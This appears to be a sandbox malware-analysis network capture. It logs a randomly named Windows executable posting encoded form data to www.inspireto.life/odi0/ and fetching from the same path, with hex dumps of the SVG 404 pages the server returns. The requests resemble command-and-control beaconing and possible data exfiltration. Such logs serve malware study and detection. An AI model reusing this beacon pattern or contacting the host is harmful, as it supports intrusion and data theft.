                                                                                                                            Dec 3, 2024 14:39:07.975573063 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                                                            Dec 3, 2024 14:39:07.975588083 CET448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                                                            Dec 3, 2024 14:39:07.975733042 CET1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                                                                                            Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                                                                                            Dec 3, 2024 14:39:07.975747108 CET1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                                                                                            Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                                                                                            Dec 3, 2024 14:39:07.975758076 CET448INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                                                                                            Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                                                                                            Dec 3, 2024 14:39:07.975955963 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                                                            Dec 3, 2024 14:39:07.976114988 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                                                            Dec 3, 2024 14:39:07.976126909 CET1236INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                                                            Dec 3, 2024 14:39:07.976305962 CET1236INData Raw: 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: e-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;s
                                                                                                                            Dec 3, 2024 14:39:08.095854044 CET1236INData Raw: 2d 77 69 64 74 68 3a 30 2e 38 32 31 37 30 32 32 34 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a
                                                                                                                            Data Ascii: -width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform="translate(-170.14515,-0.038164)" ry="3.880542" rx="3.5777507" cy="164.5713"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.649922162.0.213.94805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:09.390208006 CET1846OUTPOST /odi0/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.inspireto.life
                                                                                                                            Referer: http://www.inspireto.life/odi0/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4e 38 37 69 75 6c 47 66 6c 6d 72 35 30 37 55 36 67 76 48 73 77 5a 50 4c 43 56 74 49 71 61 44 68 69 6c 32 4f 5a 64 6c 41 33 4b 2f 67 52 4f 2b 6f 30 4f 68 77 50 6d 6a 5a 63 38 62 38 6f 75 57 4a 5a 4d 78 50 59 30 4c 79 4f 6d 63 55 52 6d 48 69 71 7a 72 2f 59 70 31 34 49 45 32 33 54 55 56 55 73 34 63 42 6a 6e 55 53 62 56 75 6c 47 46 4b 45 4b 4a 68 74 32 4c 6d 50 34 43 64 33 57 78 31 49 4b 53 38 39 4c 78 72 67 6a 70 68 64 54 78 35 4c 30 76 31 32 4a 43 2b 2f 64 79 67 4a 4c 36 6d 69 43 4e 74 33 34 39 67 47 53 45 53 77 64 74 4f 75 61 56 74 42 5a 65 65 74 47 33 65 4d 49 51 4f 42 63 30 53 4e 70 6c 6d 7a 74 42 6d 43 58 41 72 49 68 4f 36 49 4a 39 6d 70 41 61 31 62 36 48 36 75 4a 51 58 37 51 70 36 41 58 71 2b 36 71 36 34 55 74 38 4e 45 68 78 51 70 78 41 79 31 4a 4c 41 48 78 4a 54 42 51 32 4b 48 57 61 2b 54 35 66 64 78 6c 30 79 70 74 47 2b 5a 55 72 75 6a 6b 2b 6e 4e 6c 75 73 74 51 77 45 68 4e 43 34 49 54 6b 4d 51 2b 39 2b 51 75 49 58 30 64 43 72 33 4a 34 4b 74 67 76 42 46 74 36 34 6b 34 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=N87iulGflmr507U6gvHswZPLCVtIqaDhil2OZdlA3K/gRO+o0OhwPmjZc8b8ouWJZMxPY0LyOmcURmHiqzr/Yp14IE23TUVUs4cBjnUSbVulGFKEKJht2LmP4Cd3Wx1IKS89LxrgjphdTx5L0v12JC+/dygJL6miCNt349gGSESwdtOuaVtBZeetG3eMIQOBc0SNplmztBmCXArIhO6IJ9mpAa1b6H6uJQX7Qp6AXq+6q64Ut8NEhxQpxAy1JLAHxJTBQ2KHWa+T5fdxl0yptG+ZUrujk+nNlustQwEhNC4ITkMQ+9+QuIX0dCr3J4KtgvBFt64k47gF0nzR4lBq9YY/dLWMzVsxlz2PvVCMLjuPGFYGu1o0RIGTXYfposbr5ORAqscYXAk+r2IY5zIwsuqf5M66uclklVlNxmtpwvrdH8GYPDJgbP+5jXnJ5I9NNFNo/VIGdfGSfydUje491+VU/uab4+1Z7p6jWNlXGM0VJI7kaL8s4TWfp0IYfqQD71lkHoZJntLjOTTxFioJB8IppYENgjEp0109Ef6BknrYqjc+lOwxE7kW5/3Ii+Mdqxk6nsqeSEMKYavgN39LmqtF+3UuX7uagL8ZsSVbrOp3owjFZ64aoTf/OpE9m2yMjhJ6YLQ0W4wpR68aVL5Gc+cJkm/q6E51Z60fGpSrUdL/tscq31vVMMo5uZwkFj2HUDiWkMTC2OpO0uvmRC5cc1vsbDzJBRt6aFMky3IQbSXcDySTbaSP139eEtvIRdYcKE0rGX25kn5r9ST7Iz6dGXBTNuiz8YFDB3Oo3TZAZFvL0pbNRpf87VkCGaMU6VGeAw4cvr5yKrYzvuViDyEF9pRJQ7gAwWZe4ypaK61jcj+7vmYx3fU3sL0gspLCLIxvyvD30LiTmyobBIUJU/ZGx33VtTWolBMkYIoAjw1kHe/qeh55WG8gDAjY8KfIeYk38zHwW+8/yF+viZxttCx+/TFXnVOlrGMPxkYloe0YoZc [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:39:10.677865982 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:10 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:39:10.677980900 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                                                            Dec 3, 2024 14:39:10.677992105 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                                                            Dec 3, 2024 14:39:10.678219080 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                                                            Dec 3, 2024 14:39:10.678234100 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                                                            Dec 3, 2024 14:39:10.678416014 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                                                            Dec 3, 2024 14:39:10.678435087 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                                                            Dec 3, 2024 14:39:10.678617001 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                                                            Dec 3, 2024 14:39:10.678639889 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                                                            Dec 3, 2024 14:39:10.678652048 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                                                                            Dec 3, 2024 14:39:10.798011065 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.649928162.0.213.94805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:12.053571939 CET554OUTGET /odi0/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=A+TCtTOt1m7L0JkN7P72xqDuM3MJ0JKhh3i5FsNa0NmBZ9+GiOsXSm+4Udvcs/rcS+RMYR73IEQXFVaqqwbxWOBmPh+KTHFpnfkytlUBUFCYYxG0fJp40sWrzXdCUwp6RCE3NBU= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:39:13.325678110 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:13 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:39:13.325736046 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                                                                            Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                                                            Dec 3, 2024 14:39:13.325747013 CET448INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                                                                            Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                                                                            Dec 3, 2024 14:39:13.325865984 CET1236INData Raw: 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31
                                                                                                                            Data Ascii: 01 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,
                                                                                                                            Dec 3, 2024 14:39:13.325892925 CET224INData Raw: 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39
                                                                                                                            Data Ascii: 3,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.4
                                                                                                                            Dec 3, 2024 14:39:13.325917006 CET1236INData Raw: 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c
                                                                                                                            Data Ascii: 1676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="
                                                                                                                            Dec 3, 2024 14:39:13.325927973 CET1236INData Raw: 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d
                                                                                                                            Data Ascii: 11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
